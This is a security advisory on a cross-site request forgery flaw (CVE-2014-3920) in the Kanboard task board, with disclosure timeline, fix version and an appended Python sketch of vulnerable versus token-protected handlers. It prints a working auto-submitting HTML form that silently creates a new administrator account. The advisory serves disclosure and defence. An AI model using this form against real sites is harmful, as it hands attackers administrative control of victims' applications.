Cross-Site Request Forgery (CSRF) in Kanboard
Advisory ID: HTB23217
Product: Kanboard
Vendor: http://kanboard.net/
Vulnerable Version(s): 1.0.5 and probably prior
Tested Version: 1.0.5
Advisory Publication: May 28, 2014 [without technical details]
Vendor Notification: May 28, 2014
Vendor Patch: June 30, 2014
Public Disclosure: July 2, 2014
Vulnerability Type: Cross-Site Request Forgery [CWE-352]
CVE Reference: CVE-2014-3920
Risk Level: Medium
CVSSv2 Base Score: 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered a vulnerability in Kanboard which can be exploited to perform Cross-Site Request Forgery (CSRF) attacks and gain complete control over the vulnerable application.
1. Cross-Site Request Forgery (CSRF) in Kanboard: CVE-2014-3920
The vulnerability exists due to insufficient verification of the HTTP request origin: the user-creation handler accepts any POST that carries a valid administrator session cookie, and the browser attaches that cookie even when the request is triggered from a third-party page. A remote attacker can trick a logged-in administrator of Kanboard into visiting a specially crafted web page containing CSRF exploit code and thereby create a new account with administrative privileges. The attack requires the administrator to be authenticated and to visit the attacker's page, which is why the CVSS access complexity is rated High.
The simple CSRF exploit below creates a new admin account with login "immuniweb" and password "password":
<!-- The form targets Kanboard's user-creation handler. The victim's browser
     attaches the Kanboard session cookie automatically, and the handler does
     not verify where the request originated, so the cross-site POST is
     processed as if the administrator had submitted it. -->
<form action="http://kanboard/?controller=user&action=save" method="post" name="main">
<input type="hidden" name="username" value="immuniweb">
<input type="hidden" name="name" value="name">
<input type="hidden" name="email" value="mail@mail.com">
<input type="hidden" name="password" value="password">
<input type="hidden" name="confirmation" value="password">
<input type="hidden" name="default_project_id" value="0">
<input type="hidden" name="is_admin" value="1">
<input type="submit" id="btn">
</form>
<script>
// Submit the form as soon as the page loads, so the victim need not click anything.
document.main.submit();
</script>
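To make concrete what "insufficient verification of the HTTP request origin" means on the server side, the following is an added illustration written for this advisory; it is not Kanboard's code and does not reflect how the vendor's fix was implemented. It models a user-creation handler in the vulnerable pattern (session cookie is the only check) beside a hardened version that requires a per-session synchronizer token, compared in constant time, and rejects a mismatching Origin header. The request/session objects, the in-memory stores and the attacker origin http://attacker.example are assumptions made for the example; the form field names mirror the exploit above.

```python
import hmac
import secrets
from dataclasses import dataclass, field

# Constructed model of an HTTP request as a server handler sees it.
# Cookies are attached by the browser on every request to the site,
# including ones submitted by a form on an attacker-controlled page;
# the form body and headers are whatever that page chose to send.
@dataclass
class Request:
    method: str
    cookies: dict
    form: dict
    headers: dict = field(default_factory=dict)

@dataclass
class Session:
    user: str
    is_admin: bool
    # Secret token bound to this session; it is rendered into legitimate
    # forms but is unreadable from another origin (same-origin policy).
    csrf_token: str = field(default_factory=lambda: secrets.token_hex(32))

SESSIONS = {}  # session id -> Session  (hypothetical in-memory store)
USERS = {}     # username -> {"is_admin": bool}  (hypothetical user table)

def login(user, is_admin):
    """Create a session and return the cookie value the browser would store."""
    sid = secrets.token_hex(16)
    SESSIONS[sid] = Session(user=user, is_admin=is_admin)
    return sid

def current_session(req):
    return SESSIONS.get(req.cookies.get("sid"))

def create_user(form):
    USERS[form["username"]] = {"is_admin": form.get("is_admin") == "1"}

def vulnerable_user_save(req):
    """Vulnerable pattern: authentication only. Any POST the admin's browser
    can be made to send, from any site, is accepted."""
    sess = current_session(req)
    if req.method != "POST" or sess is None or not sess.is_admin:
        return 403
    create_user(req.form)
    return 200

def hardened_user_save(req, site_origin="http://kanboard"):
    """Hardened pattern: synchronizer token plus Origin check."""
    sess = current_session(req)
    if req.method != "POST" or sess is None or not sess.is_admin:
        return 403
    # If the browser sent an Origin header, it must be our own site.
    # Origin is absent on some requests, so this alone is not sufficient.
    origin = req.headers.get("Origin")
    if origin is not None and origin != site_origin:
        return 403
    # The token is the primary control: the attacker's page cannot read it,
    # so the forged form cannot include it. Constant-time compare avoids
    # leaking the token byte by byte through timing.
    submitted = req.form.get("csrf_token", "")
    if not hmac.compare_digest(submitted.encode(), sess.csrf_token.encode()):
        return 403
    create_user(req.form)
    return 200

ATTACK_FORM = {"username": "immuniweb", "password": "password", "is_admin": "1"}

def forged_request(sid, origin="http://attacker.example"):
    """What the admin's browser sends after loading the exploit page:
    session cookie included, no token, attacker's Origin (or none)."""
    headers = {"Origin": origin} if origin is not None else {}
    return Request("POST", {"sid": sid}, dict(ATTACK_FORM), headers)

def legitimate_request(sid):
    """A real submission from Kanboard's own form, which carries the token."""
    sess = SESSIONS[sid]
    form = {"username": "alice", "password": "s3cret", "is_admin": "0",
            "csrf_token": sess.csrf_token}
    return Request("POST", {"sid": sid}, form, {"Origin": "http://kanboard"})

if __name__ == "__main__":
    sid = login("admin", True)
    print("vulnerable handler, forged POST:", vulnerable_user_save(forged_request(sid)))
    USERS.clear()
    print("hardened handler, forged POST:  ", hardened_user_save(forged_request(sid)))
    print("hardened handler, real POST:    ", hardened_user_save(legitimate_request(sid)))
```

Note that the forged request still passes the cookie-based check in both handlers; only the token (and, where present, the Origin header) distinguishes it from a genuine submission. The token check is also what protects requests for which the browser omits Origin, which is why the Origin comparison is treated as a supplementary control rather than the sole defence.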
-----------------------------------------------------------------------------------------------
Solution:
Update to Kanboard 1.0.6
More Information:
http://kanboard.net/news
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23217 - https://www.htbridge.com/advisory/HTB23217 - Cross-Site Request Forgery (CSRF) in Kanboard.
[2] Kanboard - kanboard.net - A simple and open source visual task board.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.